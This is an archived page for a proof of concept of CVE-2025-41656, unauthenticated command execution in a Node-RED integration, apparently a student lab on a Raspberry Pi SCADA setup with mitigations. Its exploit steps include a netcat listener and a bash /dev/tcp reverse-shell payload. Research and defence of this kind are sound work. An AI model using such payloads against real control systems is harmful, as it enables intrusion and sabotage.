Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-41656 PoC — Pilz: Missing Authentication in Node-RED integration

Source
https://github.com/wallyschag/CVE-2025-41656
Associated Vulnerability
Title:Pilz: Missing Authentication in Node-RED integration (CVE-2025-41656)
Description:An unauthenticated remote attacker can run arbitrary commands on the affected devices with high privileges because the authentication for the Node_RED server is not configured by default.
Description
This repository includes the code and files needed to test and execute a PoC for CVE-2025-41656
Readme
# CVE-2025-41656

## Project Summary
This project exists to model **CVE-2025-41656**, an unauthenticated remote code execution vulnerability for NodeRED. To model this vulnerability, we created a small form factor SCADA system with a raspberry pi, an actuator, and a sensor. The raspberry pi contains a NodeRED and OpenPLC container that communicate with eachother over Modbus TCP to control the actuator. This is a python proof of concept script to carry out the CVE-2025-41656 attack. The goal is to successfully create a PoC and find remediations to secure the system.

## Getting started
### The lab will include the following pieces
- Rasberry Pi 3b+
- Docker compose file with NodeRED and OpenPLC containers
- An actuator
- A sensor
- A motorized device controlled by the actuator
- Note: Setup will be different depending on what hardware you have. Adjust accordingly.

### Software Installation
```
git clone git@github.com:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git
```
### Docker Setup
```
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
```
- Verify docker containers and network bridge are up and running
```
docker container ls
docker network inspect csci587-final-project_scadanet
```
- Both docker containers should be up.
- Also make sure both containers are network connected and have an assigned IP address.

## The exploit
- On host machine run `nc -lvnp 1234`
- Change the `NODE_RED_IP` and `NODE_RED_PORT` with the IP address and port (1880) of your NodeRED service in `cve_2025_41656.py`.
- Inside `cve_2025_41656` change the IP address in the line `"command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'",` to the IP address of the machine you are launching the exploit from.
```
python3 cve_2025_41656.py
```
- You should now have a reverse shell on the NodeRED container.

## Mitigation Strategies
- Implement TLS and an authentication mechanism for NodeRED.
- Segment SCADA networks to prevent unauthorized access to NodeRED.
- Monitor networks containing NodeRED with IDS/IPS systems looking for reverse shell traffic.
File Snapshot

 [4.0K]  /data/pocs/a3eaa25d4f4b44cf81af80a3b95d6eb99d595e5d
├── [2.7K]  cve_2025_41656.py
├── [ 980]  docker-compose.yml
├── [1.5K]  Dockerfile_WiringPi
├── [4.0K]  OpenPLC_v3
├── [2.1K]  README.md
└── [4.9K]  scada.st

2 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →